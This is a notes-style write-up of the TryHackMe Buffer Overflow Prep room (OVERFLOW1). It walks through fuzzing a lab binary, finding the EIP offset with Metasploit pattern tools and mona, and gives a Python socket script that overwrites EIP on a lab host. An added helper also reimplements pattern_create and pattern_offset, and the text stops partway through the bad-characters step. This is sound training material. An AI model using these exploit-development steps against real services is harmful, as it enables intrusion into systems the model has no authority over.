Buffer Overflow Prep — OverFlow1- TryHackMe

0xsanz
Sep 29, 2020

This is a write-up for the Buffer Overflow Prep room by Tib3rius on TryHackMe, in notes-style format.

Useful Links
=======

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
https://tryhackme.com/room/bufferoverflowprep

Fuzzing with long input Strings
==================
⇒ python3 -c 'print("A" * 5000)' ⇒ Generate 5000 A's
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A's to the target as the OVERFLOW1 argument: OVERFLOW1 AAAA… (5000 times)
⇒ oscp.exe crashes, which indicates the input overruns a buffer and the program can be exploited via a buffer overflow.

MSF Pattern create
===========
⇒ msf-pattern_create -l 5000
⇒ Send the generated pattern to the target exe over the nc session only (as the OVERFLOW1 argument, in place of the A's).

Mona Config
========
⇒ !mona config -set workingfolder c:\mona\%p ⇒ Run this in Immunity so mona writes its output files under c:\mona\<process name> (%p expands to the name of the debugged process)

Finding Offset
========
⇒ In Immunity Debugger, note the value in EIP after sending the pattern and crashing the exe.

⇒ msf-pattern_offset -l 5000 -q 6F43396E <==== the EIP value noted in Immunity

Offset is at 1978.

⇒ Fuzz again with 1978 A's and 4 B's
* python3 -c 'print("A" * 1978 + "B" * 4)'

  • So we see EIP is filled with four B’s. We found the exact sweet spot.

⇒ Python 3 script to test the same:

import socket
import sys

message = b"OVERFLOW1 "  # Notice the trailing space: the command word is followed by its argument
payload = message + b"A" * 1978 + b"B" * 4  # 1978 bytes of filler reach EIP, the 4 B's land in EIP

try:
    print("Sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.194.7', 1337))  # target IP and port used in the room
    s.recv(1024)                      # read the banner
    s.send(payload + b'\r\n')
    s.recv(1024)
    s.close()                         # close() must be called, not just referenced
except OSError:
    print("Cannot connect to server")
    sys.exit()
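The offset step above relies on two properties of the Metasploit pattern: it is built from upper/lower/digit triplets (Aa0Aa1Aa2…), so every 4-byte window in the first 20280 bytes is unique, and x86 is little-endian, so the register value 6F43396E was loaded from the bytes 6E 39 43 6F, i.e. the text "n9Co". The following Python is an added example, not code from the write-up or from Tib3rius' room: it reimplements the core of msf-pattern_create and msf-pattern_offset (the function names pattern_create, pattern_offset and expected_eip are my own) so the jump from "EIP = 6F43396E" to "offset 1978" can be checked by hand, and it also runs the inverse check (which EIP value a given offset should produce).

```python
# Added example (not from the write-up or from Tib3rius' room): a minimal
# reimplementation of what msf-pattern_create / msf-pattern_offset do, so the
# jump from "EIP = 6F43396E" to "offset 1978" can be verified offline.
import string
import struct
from typing import Optional

MAX_UNIQUE = 26 * 26 * 10 * 3  # the upper/lower/digit triplets repeat after 20280 bytes


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern Aa0Aa1Aa2...Ab0... used to fingerprint offsets.

    Every 4-byte window is unique within the first MAX_UNIQUE bytes, which is
    why a single EIP value identifies a single position in the pattern.
    """
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} bytes would repeat")
    out = bytearray()
    for upper in string.ascii_uppercase:        # slowest-changing character
        for lower in string.ascii_lowercase:
            for digit in string.digits:         # fastest-changing character
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, eip_hex: str) -> Optional[int]:
    """Map the EIP value seen in the debugger back to an offset in the pattern.

    x86 is little-endian: the register value 0x6F43396E was loaded from the
    bytes 6E 39 43 6F in memory, i.e. the ASCII text "n9Co". Search for that
    byte order first and fall back to big-endian, as msf-pattern_offset does.
    """
    value = int(eip_hex, 16)
    for fmt in ("<I", ">I"):
        idx = pattern.find(struct.pack(fmt, value))
        if idx != -1:
            return idx
    return None  # the value did not come from the pattern (e.g. 41414141 from the A's)


def expected_eip(pattern: bytes, offset: int) -> str:
    """Inverse check: which EIP value should appear if the overwrite starts at `offset`."""
    (value,) = struct.unpack("<I", pattern[offset:offset + 4])
    return f"{value:08X}"


if __name__ == "__main__":
    pat = pattern_create(5000)
    print("offset:", pattern_offset(pat, "6F43396E"))   # 1978, matching the write-up
    print("bytes at 1978:", pat[1978:1982])              # b'n9Co'
    print("expected EIP:", expected_eip(pat, 1978))      # 6F43396E
```

The big-endian fallback matters when a value is read from a dump in the order it appears in memory rather than from a register view; a query that matches neither order returns None, which is the "not found" result you would get when EIP holds 41414141 from the plain A's instead of a pattern fragment.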

Finding Bad Characters
=============
⇒ !mona bytearray -b "\x00" ⇒ Run this in Immunity to generate…


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900, AZ204